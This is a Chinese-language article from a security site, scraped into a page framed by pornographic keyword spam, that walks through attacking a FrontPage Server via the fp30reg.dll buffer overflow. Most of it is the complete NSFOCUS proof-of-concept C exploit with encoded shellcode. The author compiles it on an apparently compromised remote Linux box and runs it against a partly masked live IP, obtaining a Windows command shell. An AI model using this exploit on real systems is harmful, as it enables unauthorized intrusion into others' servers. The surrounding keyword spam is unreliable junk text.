国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

實例為你解說FrontPageServer溢出攻擊
2007-03-08   賽迪網安全社區

【編者按:文中內容僅供參考,請勿用于不當之處。】

本篇文章將針對FrontPage Server的fp30reg.dll溢出漏洞為大家進行講解。這里以61.153.xxx.xxx為例進行說明。首先使用.ping命令檢測一下地址是否有效,

Pinging 61.153.xxx.xxxwith 32 bytes of data:

Reply from 61.153.xxx.xx: bytes=32 time=36ms TTL=124 
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124 
Reply from 61.153.xxx.xx: bytes=32 time=35ms TTL=124

符合條件,開始進行。

telnet 211.100.xxx.xxx(My fat hen,haha) 
Red Hat Linux release 7.0.1J (Guinness)
Kernel 2.2.16-22 on an i686 
login: bytes 
passwd:xxxxxxx
[root@glb-linux-1 bytes]#id 
uid=0 (root) gid=2513(other)

下面是原碼:

[root@glb-linux-1 bytes]# vi kill.c 


/* 
*  fpse2000ex.c - Proof of concept code for fp30reg.dll overflow bug. 
*  Copyright (c) 2001 - Nsfocus.com 
* 
*  DISCLAIMS: 
*  This  is a proof of concept code.  This code is for test purpose 
*  only and should not be run against any host without permission from 
*  the system administrator. 
* 
*  NSFOCUS Security Team 
*  http://www.nsfocus.com 
*/ 
/* # 前面這里是版權信息,以及程序說明*/ 


#include  
#include   
#include   
#include   
#include   
#include   
#include   
#include   

/* fat shellcode */ 
/* # shellcode比較多 */ 
char shellcode[] = 

"\xeb\x1a\x5f\x56\x56\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x5\x34" 
"\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe1\xff\xff\xff\xff\x21\x46\x2b\x46" 
"\xb6\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x4e\x5c\x55\x55\x13\xed\xa8\xaa\xaa\x12" 
"\x66\x66\x66\x66\x59\x1\x6d\x2f\x66\x5d\x55\x55\xaa\xaa\xaa\xaa\x21\xef\xa2" 
"\x21\x22\x2e\xaa\xaa\xaa\x23\x27\x62\x5d\x55\x55\x21\xff\xa2\x21\x28\x22\xaa"
"\xaa\xaa\x23\x2f\x6e\x5d\x55\x55\x21\xe7\xa2\x21\xfb\xa2\x23\x3f\x6a\x5d\x55"
"\x55\x43\x61\xaf\xaa\xaa\x25\x2f\x16\x5d\x55\x55\x27\x17\x5a\x5d\x55\x55\xce"
"\xb\xaa\xaa\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x2f\x5a\x5d" 
"\x55\x55\x55\x55\x55\x55\x21\x2f\x16\x5d\x55\x55\x29\x42\xad\x23\x2f\x5e\x5d"
"\x55\x55\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x4a\xdd\x42\xcd\xaf\xaa\xaa\x29\x17"
"\x66\x5d\x55\x55\xaa\xa5\x2f\x77\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x2b\x6b"
"\xaa\xaa\xab\xaa\x23\x27\x12\x5d\x55\x55\x2b\x17\x12\x5d\x55\x55\xaa\xaa\xaa"
"\xd2\xdf\xa0\x6d\x2f\x12\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x3f\x12\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x2f\x30\x70\xab\xaa\xaa\x21\x27"
"\x12\x5d\x55\x55\x21\xfb\x96\x21\x2f\x12\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba"
"\x2b\x53\xfa\xef\xaa\xaa\xa5\x2f\xd3\xab\xaa\xaa\x21\x3f\x12\x5d\x55\x55\x21"
"\xe8\x96\x21\x27\x12\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x3f\x12\x5d\x55\x55\x23"
"\x3f\x1e\x5d\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x12\x5d\x55"
"\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x2b\x90\xe1\xef\xf8\xe4\xa5"
"\x2f\x99\xab\xaa\xaa\x21\x2f\x6\x5d\x55\x55\x2b\xd2\xae\xef\xe6\x99\x98\xa5"
"\x2f\x8a\xab\xaa\xaa\x21\x27\x12\x5d\x55\x55\x23\x27\xe\x5d\x55\x55\x21\x3f" 
"\x1e\x5d\x55\x55\x21\x2f\x12\x5d\x55\x55\xa9\xe8\x8a\x23\x2f\x6\x5d\x55\x55" 
"\x6d\x2f\x2\x5d\x55\x55\xaa\xaa\xaa\xaa\x41\xb4\x21\x27\x2\x5d\x55\x55\x29\x6b"
"\xab\x23\x27\x2\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\x29\x68\xae\x23\x3f\x6\x5d" 
"\x55\x55\x21\x2f\x1e\x5d\x55\x55\x21\x27\x2\x5d\x55\x55\x91\xe2\xb2\xa5\x27" 
"\x6a\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8\x21\x27\x12\x5d\x55\x55\x2b" 
"\x96\xab\xed\xcf\xde\xfa\xa5\x2f\xa\xaa\xaa\xaa\x21\x3f\x6\x5d\x55\x55\x21\xa8"
"\x21\x27\x12\x5d\x55\x55\x2b\xd6\xab\xae\xd8\xc5\xc9\xeb\xa5\x2f\x2e\xaa\xaa" 
"\xaa\x21\x3f\x2\x5d\x55\x55\xa9\x3f\x2\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55" 
"\x21\x2f\x1e\x5d\x55\x55\x21\xe2\x8e\x99\x6a\xcc\x21\xae\xa0\x23\x2f\x6\x5d"
"\x55\x55\x21\x27\x1e\x5d\x55\x55\x21\xfb\xba\x21\x2f\x6\x5d\x55\x55\x27\xe6"
"\xba\x55\x23\x27\x6\x5d\x55\x55\x21\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55"
"\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x6\x5d\x55\x55\xa9\x3f\x12\x5d\x55\x55\x21\x2f"
"\x1e\x5d\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x3f\x6\x5d\x55\x55\x21\x2f\x6\x5d"
"\x55\x55\xa9\x2f\x12\x5d\x55\x55\x23\x2f\x66\x5d\x55\x55\x41\xaf\x43\xa7\x55" 
"\x55\x55\x43\xbc\x54\x55\x55\x27\x17\x5a\x5d\x55\x55\x21\xed\xa2\xce\x9\xaa" 
"\xaa\xaa\xaa\x29\x17\x66\x5d\x55\x55\xaa\xdf\xaf\x43\xf4\xa9\xaa\xaa\x6d\x2f"
"\x6\x5d\x55\x55\xab\xaa\xaa\xaa\x41\xa5\x21\x27\x6\x5d\x55\x55\x29\x6b\xab\x23"
"\x27\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xa2\xd7\xc4\x21\x5e\x21\x3f\x16" 
"\x5d\x55\x55\xf8\x21\x2f\xe\x5d\x55\x55\xfa\x55\x3f\x66\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x21\x27\x6\x5d\x55\x55\x23\x2e\x27\x7a\x5d\x55\x55\x41"
"\xa5\x21\x3f\x16\x5d\x55\x55\x29\x68\xab\x23\x3f\x16\x5d\x55\x55\x21\x2f\x16"
"\x5d\x55\x55\xa5\x14\xa2\x2f\x63\xdf\xba\x21\x3f\x16\x5d\x55\x55\xa5\x14\xe8" 
"\xab\x2f\x6a\xde\xa8\x41\xa8\x41\x78\x21\x27\x16\x5d\x55\x55\x29\x6b\xab\x23" 
"\x27\x16\x5d\x55\x55\x43\xd0\x55\x55\x55\x6d\x2f\x8e\x5d\x55\x55\xa6\xaa\xaa" 
"\xaa\x6d\x2f\x82\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x2f\x86\x5d\x55\x55\xab\xaa" 
"\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xe2\x5d\x55\x55" 
"\xfa\x27\x27\xe6\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x21\x5e\xc0\xaa\x27\x3f\x8e\x5d\x55\x55\xf8\x27\x2f\xea\x5d\x55\x55" 
"\xfa\x27\x27\xee\x5d\x55\x55\xfb\x55\x3f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x27\x17\xca\x5d\x55\x55\x99\x6a\x13\xbb\xaa\xaa\xaa\x58\x1\x6d\x2f" 
"\x26\x5d\x55\x55\xab\xab\xaa\xaa\xcc\x6d\x2f\x3a\x5d\x55\x55\xaa\xaa\x21\x3f" 
"\xee\x5d\x55\x55\x23\x3f\x32\x5d\x55\x55\x21\x2f\xe2\x5d\x55\x55\x23\x2f\x36" 
"\x5d\x55\x55\x21\x27\xe2\x5d\x55\x55\x23\x27\xa\x5d\x55\x55\x6d\x2f\x6\x5d\x55" 
"\x55\xaa\xaa\xaa\xaa\x21\x5e\x27\x3f\xfa\x5d\x55\x55\xf8\x27\x2f\xca\x5d\x55" 
"\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa\x21\x27\x16\x5d\x55" 
"\x55\xfb\xc0\xaa\x55\x3f\x72\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x2f" 
"\x6\x5d\x55\x55\x21\x3f\x16\x5d\x55\x55\x29\x68\xa2\x23\x3f\x16\x5d\x55\x55" 
"\x21\x5e\xc0\xaa\xc0\xaa\x27\x2f\x96\x5d\x55\x55\xfa\xc2\xaa\xa2\xaa\xaa\x27" 
"\x27\x56\x5d\x55\x55\xfb\x21\x3f\xe6\x5d\x55\x55\xf8\x55\x3f\x4a\x5d\x55\x55" 
"\x91\x5e\x3a\xe9\xe1\xe9\xe1\x6d\x2f\x6\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e" 
"\xc0\xaa\x27\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\x29\x6b\xa3\xfb" 
"\x21\x3f\x6a\x5d\x55\x55\xf8\x55\x3f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" 
"\xe1\x12\xab\xaa\xaa\xaa\x2f\x6a\xa5\x2e\xf4\xab\xaa\xaa\x21\x5e\xc0\xaa\xc0" 
"\xaa\x27\x27\x96\x5d\x55\x55\xfb\xc2\xaa\xa2\xaa\xaa\x27\x3f\x56\x5d\x55\x55" 
"\xf8\x21\x2f\xe6\x5d\x55\x55\xfa\x55\x3f\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x29\x17\x96\x5d\x55\x55\xaa\xd4\xcb\x21\x5e\xc0\xaa\x27\x27\x96\x5d" 
"\x55\x55\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27" 
"\xe6\x5d\x55\x55\xfb\x55\x3f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29" 
"\x17\x96\x5d\x55\x55\xaa\xd4\x8c\x21\x5e\xc0\xaa\x27\x3f\x96\x5d\x55\x55\xf8" 
"\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x62\x5d\x55" 
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x68\xaa\xaa\xaa\x6d\x2f\x96\x5d\x55\x55" 
"\xaa\xa2\xaa\xaa\x21\x5e\x27\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55" 
"\xfa\x21\x27\x6a\x5d\x55\x55\xfb\x55\x3f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1" 
"\xe9\xe1\x23\x2f\x6\x5d\x55\x55\x29\x17\x6\x5d\x55\x55\xab\xde\xf2\x6d\x2f\x6" 
"\x5d\x55\x55\xa2\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x3f\x6\x5d\x55\x55\xf8\x21" 
"\x2f\x6\x5d\x55\x55\xfa\x21\x27\x16\x5d\x55\x55\xfb\x21\x3f\xea\x5d\x55\x55" 
"\xf8\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x12\xab\xaa\xaa\xaa" 
"\x2f\x6a\xde\xbc\x21\x5e\xc2\x55\x55\x55\xd5\x55\x3f\x46\x5d\x55\x55\x91\x5e" 
"\x3a\xe9\xe1\xe9\xe1\x41\x4b\x41\x87\x21\x5e\xc0\xaa\x27\x27\x96\x5d\x55\x55" 
"\xfb\x21\x3f\x96\x5d\x55\x55\xf8\x27\x2f\x56\x5d\x55\x55\xfa\x21\x27\xea\x5d" 
"\x55\x55\xfb\x55\x3f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\x3f\x54" 
"\x55\x55\x41\x54\xf2\xfa\x21\x17\x16\x5d\x55\x55\x23\xed\x58\x69\x21\xee\x8e" 
"\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\x9a" 
"\x50\x55\x55\xe9\xd8\xcf\xcb\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde" 
"\xcf\xfa\xd8\xc5\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce" 
"\xc6\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa\xf8\xcf" 
"\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3\xc6\xcf\xaa\xf9\xc6" 
"\xcf\xcf\xda\xaa\xaa\xc9\xc7\xce\x84\xcf\xd2\xcf\xaa\xa7\xa0\xcf\xd2\xc3\xde" 
"\xa7\xa0\xaa\xf2\xe5\xf8\xee\xeb\xfe\xeb\xaa"; 
/* # 結束*/ 

int 
resolv (char *host, long *ip) 
{ 
     struct hostent *hp; 
     if ((*ip = inet_addr (host))<0) 
     { 
       if ((hp = gethostbyname (host)) == NULL) 
       { 
         fprintf (stderr, "%s: unknown host\n", host); 
         exit (-1); 
       } 
      *ip = *(unsigned long *) hp->h_addr; 
    } 
return 0; 
} 

int 
connect_to (char *hostname, short port) 
{ 
struct sockaddr_in sa; 
int s; 
s = socket (AF_INET, SOCK_STREAM, 0); 
resolv (hostname, (long *) &sa.sin_addr.s_addr); 
sa.sin_family = AF_INET; 
sa.sin_port = htons (port); 
if (connect (s, (struct sockaddr *) &sa, sizeof (sa)) == -1) 
   { 
      perror("connect"); 
      exit(-1); 
  } 
return s; 
} 

void 
runshell (int sockd) 
{ 
char buff[1024]; 
int ret; 
fd_set fds; 
printf("\nPress CTRL_C to exit the shell!\n"); 
for (;
   { 
     FD_ZERO (&fds); 
     FD_SET (0, &fds); 
     FD_SET (sockd, &fds); 
     if (select (sockd + 1, &fds, NULL, NULL, NULL) < 0) 
       { 
         exit (-1); 
       } 
     if (FD_ISSET (sockd, &fds)) 
       { 
         bzero (buff, sizeof buff); 
          if ((ret=read(sockd,buff,sizeof(buff)))<1) 
           { 
             fprintf (stderr, "Connection closed\n"); 
             exit (-1); 
           } 
         write(1,buff,ret); 
       } 

     if (FD_ISSET (0, &fds)) 
       { 
         bzero (buff, sizeof buff); 
         ret=read(0,buff,sizeof(buff)); 
         write(sockd,buff,ret); 
       } 
   } 
} 


main (int argc, char **argv) 
{ 
char overbuff[400]; 
char buff[4096]; 
/* If system has the unicode bug, it is possible to attack fp4areg.dll */ 
/* char fppath[] = "/_vti_bin/..%c1%9cbin/fp4areg.dll"; */ 
char fppath[] = "/_vti_bin/_vti_aut/fp30reg.dll"; 
char server[] = "www.blahblah.com"; 
char retaddress[] = "\x62\x18\xd5\x67"; 
char jmpshell[] = "\xff\x66\x78"; 
int  i, sockfd; 
int port = 80; 
if (argc < 2) 
   { 
     printf ("Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security 
Team\n\n"); 
     printf ("Usage: %s victim [port]\n", argv[0]); 
     exit (-1); 
   } 
if (argc > 2) port = atoi (argv[2]); 
sockfd = connect_to (argv[1], port); 
bzero (overbuff, sizeof (overbuff)); 
bzero (buff, sizeof (buff)); 
memset (overbuff, 'a', 258); 
memcpy (overbuff, jmpshell, strlen (jmpshell)); 
strcpy (overbuff + 258, "%c"); 
for (i = 0; i < 0x50; i += 4) 
     strncat (overbuff, retaddress, 4); 
strcat (overbuff, "aaa"); 
sprintf (buff, 
          "GET %s?%s HTTP/1.1 \nHOST:%s\r\nContent-Type: \ 
text/html\nContent-Length:%d\r\nProxy_Connection: Keep-Alive\r\n\r\n%s", 
          fppath, overbuff, server, strlen (shellcode), shellcode); 
printf ("buff len = %d\n", strlen (buff)); 
write (sockfd, buff, strlen (buff)); 
printf ("payload sent!\n"); 
if(read (sockfd, buff, strlen(buff))<0) 
{ 
   printf("EOF\n"); 
   exit(-1); 
} 
else 
{ 
   if(memcmp(buff,"XORDATA",8)==0) 
   { 
    printf("exploit succeed\n"); 
    /* Press Enter key to get the command prompt */ 
    runshell (sockfd); 
   } 
   else 
   { 
    printf("exploit failed\n"); 
    close(sockfd); 
    exit(-1); 
   } 
} 
}

:w
:q(保存并退出)

[root@glb-linux-1 bytes]# gcc -o kill kill.c(編譯成功) 
[root@glb-linux-1 bytes]#  ./kill(先看一下說明) 
Proof of concept code for fp30reg.dll overflow bug by NSFOCUS Security Team 

Usage: ./iis victim [port] 

[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80 

buff len = 2201 

payload sent! 

exploit failed

[root@glb-linux-1 bytes]# ./kill 61.153.xxx.xx 80(再來~!) 

buff len = 2201 

payload sent! 

exploit succeed 

Press CTRL_C to exit the shell!(這就是我們想得到的一個shell) 

dir c:\ 

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

顯示是Windows2000系統,那么就只有machinename權限了。

C:\WINNT\system32>cd c:\ 
c:\dir 
……

接下來的就不再予以介紹了。

熱詞搜索:

上一篇:用管理員權限打開Vista命令行窗口
下一篇:不用改文件名 防止IIS文件被下載方法

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
尹人成人综合网| 欧美精品一区二区在线播放| 伊人久久大香线蕉av超碰演员| 在线观看日韩一区| 在线日韩av永久免费观看| 亚洲国产三级网| 999亚洲国产精| 久久久国产成人精品| 欧美精品久久99久久在免费线| 国产精品久久久久一区二区三区| 一区二区三区在线视频播放 | 亚洲在线播放| 免费不卡在线视频| 国产精品试看| 亚洲午夜久久久久久久久电影院| 欧美国产精品久久| 亚洲国产精品www| 久久综合九色九九| 国产自产2019最新不卡| 欧美一区二区三区在线观看| 欧美午夜理伦三级在线观看| 99精品国产福利在线观看免费| 蜜臀99久久精品久久久久久软件 | 久久精品视频免费观看| 国产精品高潮久久| 一区二区毛片| 国产精品久久久久久超碰| 亚洲美洲欧洲综合国产一区| 欧美大胆人体视频| 亚洲欧洲日本mm| 欧美日本国产视频| 亚洲一区二区高清| 欧美日韩免费观看一区| 一区二区三区日韩精品视频| 欧美日韩国产综合在线| 亚洲一区二区三区激情| 国产九区一区在线| 久久久av毛片精品| 有坂深雪在线一区| 欧美理论电影在线观看| 中文亚洲免费| 国产亚洲a∨片在线观看| 久久精品一二三| 韩日欧美一区二区三区| 欧美成人精品一区二区三区| 亚洲精品女人| 国产精品久久久久久亚洲调教| 性欧美暴力猛交69hd| 黄色成人在线网址| 欧美大秀在线观看| 中文av字幕一区| 国产一区二区三区黄| 欧美freesex交免费视频| 亚洲午夜免费视频| 精品不卡视频| 欧美视频在线观看一区二区| 久久成人免费网| 亚洲每日在线| 黑人极品videos精品欧美裸| 欧美日韩国产麻豆| 久久国产福利| 亚洲无线视频| 在线观看亚洲精品| 国产精品一区二区三区四区五区| 久久综合导航| 性欧美1819性猛交| 亚洲精品一区二区三区福利| 国产欧美午夜| 欧美日韩综合精品| 美女图片一区二区| 亚洲欧美清纯在线制服| 亚洲精品一区二区三区在线观看 | 国产精品久久二区| 久久精品国产免费看久久精品| 亚洲美女在线观看| 国内精品免费在线观看| 国产精品久久久久久久久| 麻豆精品在线播放| 久久激情视频久久| 亚洲婷婷综合久久一本伊一区| 亚洲国产成人av好男人在线观看| 国产麻豆精品视频| 国产精品久久久久久久久久尿 | 欧美一级艳片视频免费观看| 亚洲啪啪91| 在线观看日产精品| 国产一区日韩一区| 国产亚洲aⅴaaaaaa毛片| 欧美体内谢she精2性欧美| 欧美99在线视频观看| 久久黄色网页| 欧美一二三区精品| 亚洲欧美日韩一区二区三区在线| 99精品视频免费全部在线| 精品999网站| 激情综合网址| 伊人久久综合97精品| 国产亚洲美州欧州综合国| 国产日韩av高清| 国产午夜一区二区三区| 国产一区日韩欧美| 黄色成人在线免费| 狠狠色狠狠色综合| 好看的亚洲午夜视频在线| 国产一区二区三区在线观看免费视频| 国产精品露脸自拍| 国产精品日产欧美久久久久| 国产精品欧美日韩| 国产婷婷色一区二区三区| 国产午夜一区二区三区| 黄网站免费久久| 亚洲日本成人网| 一区二区三区精品国产| 亚洲一区国产精品| 久久国产精品72免费观看| 久久这里有精品15一区二区三区| 欧美jizzhd精品欧美喷水| 欧美日韩精品久久久| 国产精品老牛| 1024亚洲| 中文精品视频| 久久精品网址| 欧美精品一区二区三区在线看午夜| 欧美日韩亚洲天堂| 国产欧美一区二区三区在线看蜜臀 | 欧美尤物一区| 久久这里有精品视频| 欧美日韩123| 狠狠爱www人成狠狠爱综合网| 亚洲精品国产系列| 欧美在线不卡| 欧美日韩在线播放一区| 韩国成人精品a∨在线观看| 亚洲人成7777| 久久精品日韩欧美| 国产精品xvideos88| 亚洲国产精品一区二区三区| 亚洲欧美国产高清va在线播| 久久米奇亚洲| 国产精品高潮呻吟久久av黑人 | 欧美电影免费观看网站| 国产精品久久久久毛片软件 | 欧美日韩色综合| 国产一区二区三区在线观看免费视频 | 欧美在线综合| 欧美精品日韩综合在线| 韩国自拍一区| 午夜精品久久久久久99热软件| 免费久久久一本精品久久区| 国产精品一区免费视频| 亚洲国产视频一区| 欧美一区二区三区四区夜夜大片 | 欧美国产精品日韩| 国产综合久久| 亚洲欧美国产77777| 欧美日韩另类国产亚洲欧美一级| 在线观看91精品国产入口| 性色av一区二区三区红粉影视| 欧美日本在线看| 亚洲精品免费在线| 久久蜜桃av一区精品变态类天堂| 国产视频精品xxxx| 欧美一级视频免费在线观看| 国产精品乱码人人做人人爱| 亚洲天堂av在线免费观看| 欧美—级在线免费片| 亚洲欧洲综合另类在线| 欧美激情中文字幕乱码免费| 亚洲国产精品一区二区www在线| 久久亚洲国产精品一区二区| 国产亚洲欧美日韩一区二区| 欧美中文字幕精品| 国产欧美日韩视频在线观看| 午夜精品福利视频| 国产精品丝袜xxxxxxx| 欧美亚洲一区二区在线| 国产一区二区三区网站| 美玉足脚交一区二区三区图片| 亚洲国产日韩欧美在线图片| 欧美激情视频一区二区三区不卡| 亚洲欧洲精品一区二区三区不卡 | 亚洲国产欧美日韩| 欧美va亚洲va国产综合| 亚洲精品乱码视频| 欧美丝袜一区二区三区| 亚洲欧美日韩精品一区二区| 国产欧美日韩一区二区三区| 久久国产精品一区二区三区| 亚洲动漫精品| 欧美性大战久久久久久久蜜臀| 亚洲欧美综合精品久久成人| 国产在线观看91精品一区| 欧美a级一区| 亚洲视频www| 国产一区二区三区四区在线观看| 免费日韩视频| 亚洲图片欧洲图片av| 狠狠色噜噜狠狠色综合久| 老牛嫩草一区二区三区日本 | 欧美日韩一区自拍|